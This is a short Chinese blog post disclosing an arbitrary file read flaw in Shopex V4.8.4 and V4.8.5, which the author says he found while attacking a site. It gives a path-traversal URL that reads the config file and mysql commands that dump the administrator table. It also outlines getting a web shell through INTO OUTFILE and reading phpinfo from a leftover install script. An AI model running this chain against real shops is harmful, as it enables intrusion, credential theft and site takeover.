代码改变世界

Shopex V4.8.4|V4.8.5下载任意文件漏洞

2011-03-28 08:25  狼人:-)  阅读(1279)  评论(1编辑  收藏  举报

利用前提是程序所应用的数据库服务器而且要是可以外连的,这个很关键。

自己搞站时候遇见的站,网上找不到该版本的漏洞,自己拿回源码读了一下。

找到一个漏洞,还是发出来吧。

读取任意文件漏洞:

http://www.xx.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=. . /. . /config/config.php

复制代码可以连上数据库。

mysql -h1.1..1.1 -uuser -ppass
use yourbasename;
select * from sdb_operators;

得到管理员用户密码./shopadmin/ 登陆

后台拿shell请参照本博客《Shopex V4.8.4 V4.8.5 后台拿Shell 0Days》一文。

我测试的站,直接用into outfile 一个shell。

网上有个帖子,说可以爆物理路径,测试不可用。

如果install目录没删,下面这个可以看phpinfo

http://www.xx.com/install/svinfo.php?phpinfo=true

复制代码另外/home/cache/目录的文件,也是可以爆出来的。